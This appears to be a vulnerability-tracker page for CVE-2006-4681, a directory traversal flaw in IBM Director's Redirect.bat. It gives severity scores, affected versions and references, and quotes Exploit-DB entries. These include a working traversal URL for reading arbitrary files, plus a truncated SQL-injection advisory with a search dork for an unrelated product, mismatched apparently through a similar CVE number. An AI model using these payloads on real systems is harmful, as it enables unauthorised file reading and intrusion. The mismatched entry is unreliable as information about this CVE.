CVE-2006-4681
published 2006-09-11CVE-2006-4681: Directory traversal vulnerability in Redirect.bat in IBM Director before 5.10 allows remote attackers to read arbitrary files via a .. (dot dot) sequence in…
PriorityP429medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.58%
88.0th percentile
Directory traversal vulnerability in Redirect.bat in IBM Director before 5.10 allows remote attackers to read arbitrary files via a .. (dot dot) sequence in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | director | <= 3.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
exploitdb·2009-07-21
CVE-2009-4681 phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
---
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/ ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit SQL INJECTION + LIVE : vulnerability ]===
[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[»
Exploit-DB
IBM Director < 5.10 - 'Redirect.bat' Directory Traversal
exploitdb·2006-09-07
CVE-2006-4681 IBM Director < 5.10 - 'Redirect.bat' Directory Traversal
IBM Director < 5.10 - 'Redirect.bat' Directory Traversal
---
There is a vulnerability within the Redirect.bat file on a ibm director
cgi which allows a directory transversal to take place which in turn
exposes most files on the system to be read without authorization.
http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here)
This was fixed in the 5.10 version of ibm director.
-Daniel Clemens
# milw0rm.com [2006-09-07]
No writeups or analysis indexed.
ftp://ftp.software.ibm.com/pc/pccbbs/pc_servers_pdf/dir5.10_docs_relnotes.pdfhttp://secunia.com/advisories/21802http://securitytracker.com/id?1016815http://www.securityfocus.com/bid/19898http://www.vupen.com/english/advisories/2006/3532https://exchange.xforce.ibmcloud.com/vulnerabilities/28836https://www.exploit-db.com/exploits/2320ftp://ftp.software.ibm.com/pc/pccbbs/pc_servers_pdf/dir5.10_docs_relnotes.pdfhttp://secunia.com/advisories/21802http://securitytracker.com/id?1016815http://www.securityfocus.com/bid/19898http://www.vupen.com/english/advisories/2006/3532https://exchange.xforce.ibmcloud.com/vulnerabilities/28836https://www.exploit-db.com/exploits/2320
2006-09-11
Published